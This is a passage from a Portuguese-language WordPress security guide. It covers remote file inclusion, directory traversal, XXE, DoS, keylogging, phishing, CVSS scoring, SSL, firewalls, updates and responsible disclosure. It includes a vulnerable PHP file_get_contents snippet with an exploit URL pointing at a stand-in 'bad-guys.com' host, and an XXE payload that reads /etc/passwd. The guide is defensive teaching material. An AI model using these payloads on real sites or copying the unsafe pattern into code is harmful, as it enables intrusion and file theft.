 if(isset($_GET['url'])){ $content=file_get_contents($_GET['url']);

O código pode ser explorado alterando o valor do valor content.filter.php?url= . Por exemplo:

 yoursite.com//wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://bad-guys.com/exec

Prevenção de inclusão remota de arquivos

Crie uma lista de arquivos permitidos que a página pode incluir e, em seguida, use um identificador para acessar o arquivo selecionado. Em seguida, bloqueie qualquer solicitação que contenha um identificador inválido.

17. Vulnerabilidade de travamento de diretório

Uma vulnerabilidade Directory Traversal ou File Traversal permite que um invasor leia arquivos arbitrários no servidor que está executando um aplicativo.

Exemplo de análise de diretório

As versões 5.7 - 5.03 do WordPress eram vulneráveis ​​a ataques de travessia de diretório porque não conseguiam verificar os dados de entrada do usuário de maneira adequada. Um invasor com acesso a uma conta com pelo menos privilégios de author pode explorar a vulnerabilidade de travessia de diretório e executar código PHP malicioso no servidor subjacente, levando a um controle remoto completo.

Como Prevenir a Traversal do Diretório

Os desenvolvedores podem usar índices em vez de partes reais de nomes de arquivo ao modelar ou usar arquivos de idioma.

18. Vulnerabilidade de redirecionamento malicioso

Uma vulnerabilidade de redirecionamento malicioso permite que um invasor injete código para redirecionar os visitantes do site para outro site.

Exemplo de redirecionamento malicioso

Digamos que você esteja procurando um suéter azul usando a ferramenta de pesquisa de uma boutique online.

Infelizmente, o servidor da boutique não consegue codificar as entradas do usuário corretamente e um invasor pode injetar um script de redirecionamento malicioso em sua consulta de pesquisa.

Então, quando você digita suéter azul no campo de pesquisa da boutique e pressiona Enter, você acaba na página do invasor em vez da página da boutique com suéteres que correspondem à descrição de sua pesquisa.

Como prevenir o redirecionamento malicioso

Você pode se proteger contra redirecionamentos maliciosos, higienizando as entradas do usuário, validando URLs e obter a confirmação do visitante para todos os redirecionamentos externos.

19. Vulnerabilidade de entidade externa XML

Uma vulnerabilidade XXE ou XML External Entity permite que um invasor engane um analisador XML para passar informações confidenciais para uma entidade externa sob seu controle.

Exemplo de entidade externa XML

Um invasor pode explorar uma vulnerabilidade XXE para obter acesso a arquivos confidenciais como etc / passwd, que armazena informações de contas de usuários.

 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo>

Como Prevenir a Entidade Externa XML

A melhor maneira de evitar o XXE é usar formatos de dados menos complexos, como JSON, e evitar a serialização de dados confidenciais.

20. Ataque de negação de serviço

Um ataque DoS ou de negação de serviço é uma tentativa deliberada de tornar seu site ou aplicativo indisponível para os usuários, inundando-o com tráfego de rede.

Em um ataque de negação de serviço distribuído DDoS , um invasor usa várias fontes para inundar uma rede com tráfego. Um invasor irá sequestrar grupos de computadores infectados por malware, roteadores e dispositivos IoT, para aumentar o fluxo de tráfego.

Exemplo de ataque de negação de serviço

O maior ataque DDoS (negação de serviço distribuído) foi lançado contra a AWS em fevereiro deste ano. A Amazon relatou que o AWS Shield, seu serviço gerenciado de proteção contra ameaças, observou e mitigou esse enorme ataque DDoS. O ataque durou 3 dias e atingiu um pico de 2,3 Terabytes por segundo.

Como prevenir ataques de negação de serviço

Existem 2 maneiras principais de mitigar um ataque DoS.

1. Compre mais hospedagem do que você precisa. Ter recursos extras à sua disposição pode ajudá-lo a enfrentar o aumento da demanda causado por um ataque DoS.
2. Use um firewall no nível do servidor como o Cloudflare. Um firewall pode detectar um pico incomum no tráfego e evitar que seu site fique sobrecarregado.

21. Registro de teclas

O registro de pressionamento de tecla, também conhecido como registro de teclas ou captura de teclado, ocorre quando um hacker monitora e grava secretamente os pressionamentos de tecla dos visitantes do site.

Exemplo de registro de pressionamento de tecla

Em 2017, um hacker instalou com sucesso o JavaScript malicioso no servidor do fabricante de smartphones OnePlus.

Usando o código malicioso, os invasores monitoraram e registraram as teclas digitadas pelos clientes OnePlus conforme eles inseriam os detalhes do cartão de crédito. Os hackers registraram e coletaram as teclas digitadas de 40.000 clientes antes que o OnePlus detectasse e corrigisse o hack.

Como evitar o registro de pressionamento de tecla

Atualize tudo! Normalmente, um invasor precisará explorar outra vulnerabilidade existente para injetar um keylogger em um computador ou servidor. Manter tudo atualizado com os patches de segurança mais recentes impedirá que os hackers instalem um keylogger em seu site ou computador com facilidade.

Bônus: Phishing

Vulnerabilidades de software são a única coisa que hackers e cibercriminosos tentam explorar. Os hackers também visam e exploram humanos. Um método comum de exploração é o Phishing.

O que é phishing?

Phishing é um método de ataque cibernético que usa e-mail, mídia social, mensagens de texto e chamadas telefônicas para induzir a vítima a fornecer informações pessoais. O invasor usará as informações para acessar contas pessoais ou cometer fraude de identidade.

Como detectar um e-mail de phishing

Como aprendemos anteriormente nesta postagem, algumas vulnerabilidades requerem algum tipo de interação do usuário para serem exploradas. Uma maneira de um hacker enganar as pessoas para que participem de seus esforços nefastos é enviando e-mails de phishing.

Aprender como identificar um e-mail de phishing pode evitar que você se meta inadvertidamente nos planos dos cibercriminosos.

4 dicas para identificar um e - mail de phishing :

1. Olhe para o endereço de e-mail de - Se você receber um e-mail de uma empresa, a parte do endereço de e-mail do remetente após o “@” deve corresponder ao nome da empresa.
   
   Se um e-mail representar uma empresa ou entidade governamental, mas estiver usando um endereço de e-mail público como “@gmail”, é sinal de um e-mail de phishing.
   
   Fique atento a erros ortográficos sutis no nome de domínio. Por exemplo, vamos dar uma olhada neste endereço de e-mail [e-mail protegido]. Podemos ver que o Netflix tem um “x” extra no final. O erro de ortografia é um sinal claro de que o e-mail foi enviado por um golpista e deve ser excluído imediatamente.
   
2. Procure erros gramaticais - Um e-mail cheio de erros gramaticais é um sinal de um e-mail malicioso. Todas as palavras podem ser escritas corretamente, mas faltam frases nas frases, o que tornaria a frase coerente. Por exemplo, “Sua conta foi hackeada. Atualize a senha para a segurança da conta ”.
   
   Todo mundo comete erros, e nem todo e-mail com um ou dois erros de digitação é uma tentativa de enganá-lo. No entanto, vários erros gramaticais exigem uma análise mais detalhada antes de responder.
   
3. Anexos ou links suspeitos - vale a pena fazer uma pausa antes de interagir com quaisquer anexos ou links incluídos em um e-mail.
   
   Se você não reconhecer o remetente de um e-mail, não baixe nenhum anexo incluído no e-mail, pois ele pode conter malware e infectar seu computador. Se o e-mail alegar ser de uma empresa, você pode pesquisar suas informações de contato no Google para verificar se o e-mail foi enviado antes de abrir qualquer anexo.
   
   Se um e-mail contiver um link, você pode passar o mouse sobre o link para verificar se o URL está enviando para onde deveria estar.
   
4. Cuidado com as solicitações urgentes - um truque comum usado pelos golpistas é criar um senso de urgência. Um e-mail malicioso pode criar um cenário que requer ação imediata. Quanto mais tempo você tiver para pensar, maior será a chance de identificar que a solicitação vem de um golpista.
   
   Você pode receber um e-mail de seu “chefe” solicitando que você pague a um fornecedor o mais rápido possível ou de seu banco informando que sua conta foi hackeada e que uma ação imediata é necessária.

Como medir a gravidade de uma vulnerabilidade do WordPress

Existem vários tipos de vulnerabilidades do WordPress, todas com vários graus de risco. Felizmente para nós, o National Vulnerability Database - um projeto do Instituto Nacional de Ciência e Tecnologia - tem uma calculadora do sistema de pontuação de vulnerabilidade para determinar o risco de uma vulnerabilidade.

Esta seção do guia de vulnerabilidade do WordPress cobrirá as métricas e os níveis de gravidade do sistema de pontuação de vulnerabilidade. Embora esta seção seja um pouco mais técnica, alguns usuários podem considerá-la útil para aprofundar sua compreensão de como as vulnerabilidades do WordPress e sua gravidade são avaliadas.

Métricas comuns do sistema de pontuação de vulnerabilidade do WordPress

A equação do sistema de pontuação de vulnerabilidade usa três conjuntos diferentes de pontuações para determinar a pontuação geral de gravidade.

1. Métricas básicas

O grupo de métricas base representa as características de uma vulnerabilidade que são constantes nos ambientes do usuário.

As métricas básicas são divididas em dois grupos, Explorabilidade e Impacto.

1.1. Métricas de exploração

A pontuação de explorabilidade é baseada na dificuldade de um invasor tirar vantagem da vulnerabilidade. A pontuação é calculada usando 5 variáveis ​​diferentes.

1.1.1. Vetor de ataque (AV)

A pontuação do vetor de ataque é baseada no método em que a vulnerabilidade é explorada. A pontuação será maior quanto mais remoto um invasor pode estar para explorar a vulnerabilidade.

A ideia é que o número de invasores potenciais será muito maior se a vulnerabilidade puder ser explorada por meio de uma rede, em comparação com uma vulnerabilidade que requer acesso físico a uma exploração de dispositivo.

Quanto mais invasores em potencial houver, maior será o risco de exploração e, portanto, a pontuação do Vetor de Ataque atribuída à vulnerabilidade será maior.

1.1.2. Complexidade de ataque (AC)

O valor da complexidade é baseado nas condições necessárias para explorar a vulnerabilidade. Algumas condições podem exigir a coleta de mais informações sobre o destino, a presença de certas definições de configuração do sistema ou exceções computacionais.

A pontuação de complexidade do ataque será maior quanto menor for a complexidade necessária para explorar a vulnerabilidade.

1.1.3. Privilégios exigidos (PR)

A pontuação dos privilégios necessários é calculada com base nos privilégios que um invasor deve obter antes de explorar uma vulnerabilidade. Iremos nos aprofundar um pouco mais na seção Autenticado vs. Não Autenticado.

A pontuação será mais alta se nenhum privilégio for necessário.

1.1.4. Interação do usuário (UI)

A pontuação de interação do usuário é determinada com base no fato de uma vulnerabilidade exigir ou não a interação do usuário para ser explorada.

A pontuação será mais alta quando nenhuma interação do usuário for necessária para que um invasor explore a vulnerabilidade.

1.1.5. Alcance

A pontuação do escopo é baseada em uma vulnerabilidade em um componente de software para impactar recursos além de seu escopo de segurança.

O escopo de segurança abrange outros componentes que fornecem funcionalidade apenas para aquele componente, mesmo se esses outros componentes tiverem sua própria autoridade de segurança.

A pontuação é mais alta quando ocorre uma mudança de escopo.

1.2. Impact Metrics

As métricas de impacto capturam os efeitos diretos de uma vulnerabilidade explorada com sucesso.

1.2.1. Impacto confidencial (C)

Essa pontuação de impacto confidencial mede o impacto sobre a confidencialidade das informações gerenciadas pelo software explorado.

A pontuação é mais alta quando a perda para o software afetado é maior.

1.2.2. Integridade (I)

Essa pontuação de integridade é baseada no impacto sobre a integridade de uma vulnerabilidade explorada com êxito.

A pontuação é mais alta quando a consequência do software afetado é maior.

1.2.3. Disponibilidade (A)

A pontuação de disponibilidade é baseada no impacto da disponibilidade do software explorado.

A pontuação é mais alta quando a consequência do componente impactado é maior.

Cálculo da pontuação CVSS da pontuação básica

A pontuação básica é uma função das equações de subpontuação de Impacto e Explorabilidade. Onde a pontuação básica é definida como,

 If (Impact sub score <= 0) 0 else, Scope Unchanged 4 Roundup(Minimum[(Impact+Exploitability),10]) Scope Changed Roundup(Minimum[1.08×(Impact+Exploitability),10]) and the Impact subscore (ISC) is defined as, Scope Unchanged 6.42 × ISCBase Scope Changed 7.52 × [ISCBase - 0.029] - 3.25 × [ISCBase - 0.02] 15 Where, ISCBase = 1 - [(1 - ImpactConf) × (1 - ImpactInteg) × (1 - ImpactAvail)] And the Exploitability sub score is, 8.22 × AttackVector × AttackComplexity × PrivilegeRequired × UserInteraction

2. Métricas de pontuação temporal

As métricas temporais medem o estado atual das técnicas de exploração, a existência de quaisquer patches ou soluções alternativas ou a confiança que se tem na descrição de uma vulnerabilidade.

Espera-se que as métricas temporais mudem e mudem com o tempo.

2.1. Exploit Code Maturity (E)

A maturidade do código de exploração é baseada na probabilidade de a vulnerabilidade ser atacada.

Quanto mais fácil for a exploração de uma vulnerabilidade, maior será a pontuação de vulnerabilidade.

2.2. Nível de Remediação (RL)

O nível de remediação de uma vulnerabilidade é um fator importante para a priorização. Soluções alternativas ou hotfixes podem oferecer remediação provisória até que um patch ou atualização oficial seja lançado.

Quanto menos oficial e permanente for uma correção, maior será a pontuação de vulnerabilidade.

2.3. Confiança do relatório (RC)

A métrica de confiança do relatório mede o nível de confiança de que existe uma vulnerabilidade e a credibilidade dos detalhes técnicos.

Quanto mais uma vulnerabilidade for validada pelo fornecedor ou outras fontes confiáveis, maior será a pontuação.

Cálculo de pontuação de CVSS temporal

A pontuação temporal é definida como,

 Roundup(BaseScore v× ExploitCode Maturity × RemediationLevel × ReportConfidence)

3. Métricas de pontuação ambiental

As métricas ambientais permitem que os analistas personalizem a pontuação do CVSS com base na importância dos ativos de TI afetados.

As métricas de Exploração Ambiental e Impacto são um equivalente modificado das métricas de Base e são valores atribuídos com base na localização dos componentes da infraestrutura organizacional. Consulte as seções de métricas básicas acima para visualizar os valores e as descrições das métricas de explorabilidade e impacto.

As métricas ambientais contêm um grupo extra, Modificadores de subpontuação de impacto.

3.1. Métricas de modificadores de subpontuação de impacto

As métricas do Impact Subscore Modifiers avaliam os requisitos de segurança específicos para Confidencialidade (CR), Integridade (IR) e Disponibilidade (AR), permitindo que a pontuação ambiental seja ajustada de acordo com o ambiente dos usuários.

Cálculo de pontuação de CVSS ambiental

A pontuação ambiental é definida como,

 If (Modified Impact Sub score <= 0) 0 else, If Modified Scope is Unchanged Round up(Round up (Minimum [ (M.Impact + M.Exploitability) ,10]) × Exploit Code Maturity × Remediation Level × Report Confidence) If Modified Scope is Changed Round up(Round up (Minimum [1.08 × (M.Impact + M.Exploitability) ,10]) × Exploit Code Maturity × Remediation Level × Report Confidence) And the modified Impact sub score is defined as, If Modified Scope is Unchanged 6.42 × [ISC Modified ] If Modified Scope is Changed 7.52 × [ISC Modified - 0.029]-3.25× [ISC Modified × 0.9731 - 0.02] 13 Where, ISC Modified = Minimum [[1 - (1 - M.IConf × CR) × (1 - M.IInteg × IR) × (1 - M.IAvail × AR)], 0.915] The Modified Exploitability sub score is, 8.22 × M.AttackVector × M.AttackComplexity × M.PrivilegeRequired × M.UserInteraction 4 Where “Round up” is defined as the smallest number, specified to one decimal place, that is equal to or higher than its input. For example, Round up (4.02) is 4.1; and Round up (4.00) is 4.0.

Pontuação e gravidade geral do CVSS

O Sistema de Pontuação de Vulnerabilidade Comum Geral ou pontuação CVSS é uma representação das pontuações Base, Temporal e Ambiental.

A pontuação CVSS geral pode ser usada para dar uma ideia de quão severa ou séria é uma vulnerabilidade.

Exemplo de classificação de gravidade CVSS do mundo real

Em nosso resumo de vulnerabilidades de dezembro de 2020, relatamos uma vulnerabilidade no plugin Easy WP SMTP. A vulnerabilidade de dia zero (abordaremos as vulnerabilidades de dia zero na próxima seção) permitiu que um invasor assumisse o controle de uma conta de administrador e estava sendo explorado em liberdade.

Dando uma olhada na entrada do National Vulnerability Database, podemos encontrar a classificação de gravidade da vulnerabilidade do WP SMTP.

Vamos analisar algumas coisas da captura de tela WP SMTP NVDB acima.

Pontuação de base : a pontuação de base é 7,5, o que nos indica que a classificação de gravidade da vulnerabilidade é alta.

Vetor : o vetor nos diz que a pontuação é baseada nas equações de vulnerabilidade do CVSS 3.1 e nas métricas usadas para calcular a pontuação.

Aqui está a parte das métricas do vetor.

 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Agora vamos usar os valores e descrições da métrica básica do início deste post para entender os oito valores métricos do vetor.

1. AV: N - Isso significa que o Vetor de Ataque (AV) da vulnerabilidade é a Rede (N). Em outras palavras, um invasor precisa apenas de acesso à rede para explorar a vulnerabilidade.
2. AC: L - A Complexidade de Ataque (AC) da vulnerabilidade é Baixa (L). Em outras palavras, qualquer script kiddie pode explorar a vulnerabilidade.
3. PR: N - Os privilégios exigidos (PR) necessários para explorar a vulnerabilidade são Nenhum (N). Portanto, a vulnerabilidade não requer um usuário autenticado para ser explorada. (Abordaremos a diferença entre vulnerabilidades autenticadas e não autenticadas posteriormente nesta postagem.)
4. IU: N - A interação do usuário (IU) necessária para explorar esta vulnerabilidade é nenhuma (N). Portanto, o invasor tem os meios para explorar a vulnerabilidade por si mesmo.
5. S: U - Isso significa que o Escopo (S) da vulnerabilidade é Inalterado (U). No caso desta vulnerabilidade, o componente vulnerável e o componente afetado são os mesmos.
6. C: H - O impacto da confidencialidade (C) da vulnerabilidade é alto (H). Quando esta vulnerabilidade é explorada, resulta na perda total da confidencialidade.
7. I: N - O impacto na integridade (I) desta vulnerabilidade é nenhum (N). Quando a vulnerabilidade é explorada, não há perda de integridade ou confiabilidade das informações vulneráveis.
8. A: N - Isso significa que o Impacto da Disponibilidade (A) é Nenhum (N). Quando a vulnerabilidade é explorada, não haverá impacto na disponibilidade do seu site.

A pontuação CVSS pode nos ajudar a determinar a gravidade e o escopo de qualquer vulnerabilidade. Nas próximas seções, cobriremos alguns termos importantes de vulnerabilidade que costumam ser incluídos nas divulgações de vulnerabilidade.

Empacotando

Nesta seção, aprendemos vários elementos importantes da segurança do WordPress, incluindo as motivações dos hackers, os diferentes tipos de hacks, as vulnerabilidades exploradas pelos criminosos online, como mitigar o risco de vulnerabilidades e como determinar o risco que uma vulnerabilidade representa para o seu local na rede Internet.

Entender como os invasores tentam hackear nossos sites e seus objetivos após violá-los nos permite construir as defesas adequadas.

Nas próximas seções, você aprenderá como proteger seu site de quase todo tipo de ataque que um hacker pode lançar contra você.

Seção 4: protegendo seu servidor

O primeiro passo em sua estratégia de segurança do WordPress é proteger seu servidor. Seu servidor armazena todos os arquivos e códigos que fazem seu site funcionar.

Nesta seção, você aprenderá:

1. A importância de escolher um bom anfitrião.
2. Como criptografar comunicações em seu site.
3. Como um firewall pode ajudar a proteger seu site.

Escolha a hospedagem certa

Nem todos os hosts da web são criados iguais e escolher um exclusivamente pelo preço pode acabar custando muito mais a longo prazo com os problemas de segurança do WordPress. A maioria dos ambientes de hospedagem compartilhada é segura, mas alguns não separam adequadamente as contas de usuário.

Seu host deve estar atento quanto à aplicação dos patches de segurança mais recentes e seguir outras práticas recomendadas importantes de segurança de hospedagem do WordPress relacionadas à segurança de servidor e arquivo. Seu host deve estar atento à aplicação dos patches de segurança mais recentes e ao seguir outras práticas recomendadas de segurança de hospedagem importantes relacionadas à segurança de servidor e arquivo.

Criptografe seu site WordPress com SSL

Secure Sockets Layer, também conhecido como SSL, é uma tecnologia de segurança que fornece criptografia entre um cliente e um servidor web. Para entender isso de forma um pouco mais simples, um “cliente” é um navegador da web como o Chrome ou Safari, e um “servidor da web” é o seu site ou loja online.

Uma maneira fácil de saber se o site que você está visitando tem um certificado SSL instalado é olhar na barra de endereço do seu navegador para ver se o URL começa com HTTP ou HTTPS. Se o URL começar com HTTPS, você está navegando com segurança em um site usando SSL.

Por que o SSL é tão importante?

Não ter um certificado SSL em 2021 é caro. Porque? Se você não tiver SSL habilitado em seu site, será mais difícil para clientes em potencial descobrirem sua existência, e aqueles que o encontrarem podem ficar com medo de lhe dar dinheiro.

Sempre que fazemos uma compra online, ocorre uma comunicação entre o seu navegador e a loja online. Por exemplo, quando inserimos nosso número de cartão de crédito em nosso navegador, nosso navegador irá compartilhar o número com a loja online. Depois que a loja recebe o pagamento, ela informa ao seu navegador para informá-lo de que sua compra foi bem-sucedida.

Uma coisa a ter em mente sobre as informações compartilhadas entre nosso navegador e o servidor da loja é que as informações fazem várias paradas no trânsito. SSL fornece criptografia para a comunicação para garantir que nosso cartão de crédito não seja visto até chegar ao destino final do servidor da loja.

Para entender melhor como funciona a criptografia, pense em como nossas compras são entregues. Se você já rastreou o status de entrega de uma compra online, deve ter visto que seu pedido parou várias vezes antes de chegar em sua casa. Se o vendedor não empacotou corretamente sua compra, seria fácil para as pessoas verem o que você comprou.

SSL é uma ferramenta crucial para evitar que bandidos interceptem informações confidenciais, como senhas e números de cartão de crédito, que são compartilhados entre o cliente e o servidor da web.

Por que um certificado SSL é obrigatório para todos os sites?

Os benefícios de segurança do WordPress que você ganha por ter um certificado SSL em seu site são suficientes para torná-lo obrigatório em qualquer site. No entanto, para encorajar todos a proteger os visitantes de seus sites, os navegadores da web e os mecanismos de pesquisa criaram incentivos negativos para encorajar todos a usar SSL. Nesta seção, abordaremos as consequências dispendiosas de não habilitar o SSL em seu site.

1. Não ter SSL habilitado prejudicará suas classificações de SEO

A Otimização de Mecanismos de Busca ou SEO é o processo de otimizar seu site para ser descoberto organicamente por meio de páginas de resultados de mecanismos de busca. A vantagem do SEO é que ele é uma excelente maneira de aumentar o tráfego orgânico e não pago de seu site. Se você vende um curso de panificação, deseja que seu site esteja na primeira página de resultados para alguém que pesquisa no Google, ou o Duck Duck Go para um curso de panificação.

Sem SSL habilitado em seu site, os motores de busca irão penalizá-lo e rebaixar sua classificação. Uma das métricas que o Google usa para classificar sites em seus resultados de pesquisa é a confiabilidade. O melhor interesse do Google é não enviar seus usuários a sites inseguros, portanto, a confiabilidade é muito importante em seu algoritmo de classificação. Com o SSL adicionando tanta segurança, é uma parte significativa de como o Google avalia a confiabilidade de um site.

2. Navegadores marcam sites não SSL como não seguros

Outra forma de não ter o SSL habilitado vai custar caro, é que o navegador do visitante irá avisá-lo de que seu site não é seguro. Como mencionamos anteriormente, depois de instalar um certificado SSL em seu site, o URL de seu site mudará de http : //seuwebsite.com para https: // seuwebsite / com. O Chrome, por exemplo, marcará as páginas da web criptografadas com HTTPS como seguras com um cadeado trancado. Como alternativa, o Chrome substituirá o cadeado trancado para todas as páginas da web não criptografadas com HTTP pelo texto Not Secure .

Não comprarei em sites marcados como inseguros pelo meu navegador e não sou o único que não o fará. De acordo com um estudo da GlobalSign, 85% dos compradores online evitam sites não seguros. Lembre-se de que, em 2021, é vital que todos os seus sites usem HTTPS e não apenas suas páginas de login e checkout. Um cliente potencial pode não chegar a um check-out seguro se as páginas da loja estiverem marcadas como Não Seguras por seu navegador.

3. Você pode perder clientes em potencial

Proteger seus clientes é o motivo essencial para habilitar SSL em seu site. Se eles estiverem dispostos a confiar seus negócios a você, o mínimo que você pode fazer é recompensar essa confiança protegendo-os com o poder da criptografia.

Se um hacker puder roubar os detalhes do cartão de crédito do seu cliente devido à falta de criptografia em seu site, você não apenas perderá a confiança dele, mas também todos os seus negócios futuros.

Como posso saber se meu site tem SSL habilitado?

Uma maneira fácil de saber se o seu site tem um certificado SSL instalado é olhar na barra de endereço do seu navegador para ver se o URL começa com HTTP ou HTTPS. Se o URL começar com HTTPS, seu site está protegido por SSL.

Você também pode usar um verificador de SSL como SSL Labs. Um verificador de SSL fará a varredura em seu site em busca de um certificado SSL e o avisará quando seu certificado SSL estiver definido para expirar.

Como posso instalar um certificado SSL no meu site WordPress?

Se o seu site WordPress não tiver SSL, a primeira coisa que você deve fazer é pedir ao seu provedor de hospedagem para ver se eles fornecem um certificado SSL gratuito e configuração. Em 2021, a maioria das empresas de hospedagem inclui SSL em seus pacotes de hospedagem. Por exemplo, a iThemes Hosting fornece e gerencia SSL para todos os sites.

Se o seu host não fornecer um certificado SSL gratuito, não se preocupe, ainda há muitas outras opções.

A Cloudflare oferece um certificado SSL compartilhado gratuito para sites WordPress. Se você preferir não ter um certificado SSL compartilhado e está confortável com a linha de comando, CertBot é uma excelente opção. Certbot não apenas cria um certificado SSL grátis usando o Let's Encrypt para você, mas também gerencia automaticamente a renovação do certificado para você.

Ter SSL habilitado em seu site WordPress é uma obrigação em 2021. SSL protege a comunicação entre você e seus clientes, melhora seu SEO e dá aos visitantes de seu site o conforto de que eles estão seguros enquanto navegam em seu site.

Use um firewall de aplicativo da Web

Usar um firewall de aplicativo da Web é uma ótima maneira de adicionar outra camada de proteção ao seu site WordPress.

O que é um firewall de aplicativo da Web?

Um WAF ou Firewall de aplicativo da Web ajuda a proteger seu site da Web, monitorando o tráfego da Internet dirigido para o seu site antes de chegar ao seu site.

Ao adicionar um WAF na frente do WordPress, você está adicionando um ponto de verificação de segurança entre a Internet e seu site. Antes que o tráfego possa acessar seu site, ele deve passar pelo WAF.

Se o WAF detectar qualquer tráfego malicioso - como CSRF, XSS, SQL Injections e muito mais - ele o filtrará antes mesmo de chegar ao seu site. Não só isso, mas um WAF pode ajudar a detectar um ataque DDoS e implementar a limitação de taxa para evitar que seu site falhe.

As 3 maneiras de implementar um WAF

Existem 3 maneiras diferentes de implementar um WAF. Vamos dar uma olhada nos prós e contras de cada tipo.

1. WAF baseado em rede - um WAF baseado em rede ou físico é baseado em hardware. A principal vantagem de um WAF baseado em rede é a baixa latência que resulta da instalação local. No entanto, a desvantagem vem do preço de armazenamento e manutenção do equipamento físico. Os requisitos de preço e armazenamento físico tornam essa escolha uma escolha ruim para a maioria das pessoas.
2. WAF baseado em host - um WAF local ou baseado em host é integrado ao WordPress, normalmente usando um plug-in. A vantagem de um WAF baseado em host é que ele é mais barato do que um WAF baseado em rede. A desvantagem de um WAF local são os requisitos dos recursos do servidor. E com a filtragem de tráfego acontecendo em seu site, isso pode resultar em tempos de carregamento de página mais lentos para os visitantes de seu site.
3. WAF baseado em nuvem - um WAF baseado em nuvem é normalmente a melhor opção para a maioria das pessoas. A vantagem de um WAF baseado em nuvem é que eles são acessíveis e não exigem que você os gerencie. Além disso, com o tráfego sendo filtrado antes de chegar ao seu site, isso não vai sugar os recursos do servidor e nem diminuir a velocidade do seu site. Cloudflare e Sucuri são provedores de firewall baseados em nuvem populares.

Empacotando

Nesta seção, aprendemos por que é tão importante escolher o host certo, como proteger a comunicação entre nosso site e seus visitantes e como um WAF pode ajudar a bloquear o tráfego malicioso de acessar nosso site.

Na próxima seção, você aprenderá as práticas recomendadas para manter seu software WordPress seguro.

Seção 5: Segurança do software WordPress

Cada vez que você instala um novo plugin ou tema, você introduz um novo código que tem potencial para ser explorado por hackers. Nesta seção, você aprenderá o que fazer e o que não fazer no gerenciamento de WordPress, plug-ins e temas.

1. Instale apenas software de fontes confiáveis

Instale apenas plug-ins e temas do WordPress de fontes confiáveis. Você só deve instalar softwares obtidos no WordPress.org, em repositórios comerciais conhecidos ou diretamente de desenvolvedores confiáveis. Você deve evitar a versão “anulada” dos plug-ins comerciais porque eles podem conter código malicioso. Não importa como você bloqueia seu site WordPress se é você quem está instalando malware.

Se o plugin ou tema do WordPress não estiver sendo distribuído no site do desenvolvedor, você deverá fazer a devida diligência antes de baixar o plugin. Entre em contato com os desenvolvedores para ver se eles são de alguma forma afiliados ao site que está oferecendo seu produto a um preço gratuito ou com desconto.

2. Remova plug-ins e temas não utilizados

Ter plug-ins e temas não utilizados ou inativos em seu site é um grande erro de segurança do WordPress. Cada pedaço de código em seu site é um ponto de entrada potencial para um hacker.

É uma prática comum para desenvolvedores usar código de terceiros - como bibliotecas JS - em seus plug-ins e temas. Infelizmente, se as bibliotecas não forem mantidas adequadamente, elas podem criar vulnerabilidades que os invasores podem aproveitar para hackear seu site.

Nota: Use o iThemes Sync Pro Site Audit para verificar suas páginas da web para bibliotecas de front-end JavaScript com vulnerabilidades de segurança conhecidas.

Desinstale e remova completamente quaisquer plug-ins e temas desnecessários em seu site WordPress para limitar o número de pontos de acesso e código executável em seu site.

3. Mantenha seu software WordPress atualizado

Manter o software atualizado é uma parte essencial de qualquer estratégia de segurança do WordPress. As atualizações não são apenas para correções de bugs e novos recursos. As atualizações também podem incluir patches de segurança críticos. Sem esse patch, você está deixando seu telefone, computador, servidor, roteador ou site vulnerável a ataques.

Ter um plugin ou tema vulnerável para o qual um patch está disponível, mas não aplicado é o principal culpado de sites WordPress hackeados. Isso significa que a maioria das vulnerabilidades é explorada APÓS o lançamento de um patch para a vulnerabilidade.

A violação altamente relatada do Equifax poderia ter sido evitada se eles tivessem atualizado seu software. Para a violação da Equifax, simplesmente não havia desculpa.

Algo tão simples como atualizar seu software pode protegê-lo. Portanto, não ignore as atualizações do WordPress - as atualizações são um dos componentes mais básicos da segurança do WordPress e de toda a segurança da web.

Patch Tuesday

Patch Tuesday é o termo não oficial para se referir às correções regulares de bug e segurança que a Microsoft lança na segunda terça-feira de cada mês. É fantástico que a Microsoft libere correções de segurança em um ritmo tão confiável. A Patch Tuesday também é o dia em que as vulnerabilidades de segurança dos patches da Microsoft são divulgadas publicamente.

Confira a seção O que atualizar e como automatizar suas atualizações do e-book The Ultimate Guide to WordPress Security in 2020 para aprender como aplicar as atualizações Patch Tuesday automaticamente.

Explorar quarta-feira

Na quarta-feira seguinte ao Patch Tuesday, é comum ver muitos invasores explorando uma vulnerabilidade previamente conhecida em sistemas desatualizados e sem patch. Portanto, a quarta-feira seguinte a uma Patch Tuesday foi oficialmente cunhada como Exploit Wednesday.

Por que os hackers visam vulnerabilidades corrigidas?

Os hackers visam vulnerabilidades corrigidas porque sabem que as pessoas não atualizam (incluindo plug-ins e temas em seu site). É um padrão da indústria divulgar publicamente as vulnerabilidades no dia em que são corrigidas. Depois que uma vulnerabilidade é divulgada publicamente, ela se torna uma “vulnerabilidade conhecida” para versões desatualizadas e sem patch do software. Software com vulnerabilidades conhecidas é um alvo fácil para hackers.

Hackers gostam de alvos fáceis, e ter software com vulnerabilidades conhecidas é como entregar a um hacker as instruções passo a passo para invadir seu site WordPress, servidor, computador ou qualquer outro dispositivo conectado à Internet.

Divulgação Responsável

Você pode estar se perguntando por que uma vulnerabilidade seria divulgada se ela dá aos hackers uma exploração para atacar. Bem, é muito comum para um pesquisador de segurança encontrar e relatar em particular a vulnerabilidade para o desenvolvedor do software.

Com a divulgação responsável, o relatório inicial do pesquisador é feito em particular para os desenvolvedores da empresa proprietária do software, mas com um acordo de que todos os detalhes serão publicados assim que um patch for disponibilizado. Para vulnerabilidades de segurança significativas, pode haver um pequeno atraso na divulgação da vulnerabilidade para dar a mais pessoas tempo para corrigir.

O pesquisador de segurança pode fornecer um prazo para que o desenvolvedor de software responda ao relatório ou forneça um patch. Se este prazo não for cumprido, o pesquisador pode divulgar publicamente a vulnerabilidade para pressionar o desenvolvedor a lançar um patch.

Divulgar publicamente uma vulnerabilidade e aparentemente introduzir um Dia Zero - um tipo de vulnerabilidade que não tem patch e está sendo explorado em liberdade - pode parecer contraproducente. Mas, é a única alavanca que um pesquisador tem para pressionar o desenvolvedor a corrigir a vulnerabilidade.

Se um hacker descobrisse a vulnerabilidade, ele poderia usar silenciosamente o Exploit e causar danos ao usuário final (este é você), enquanto o desenvolvedor de software continua contente em deixar a vulnerabilidade sem correção.

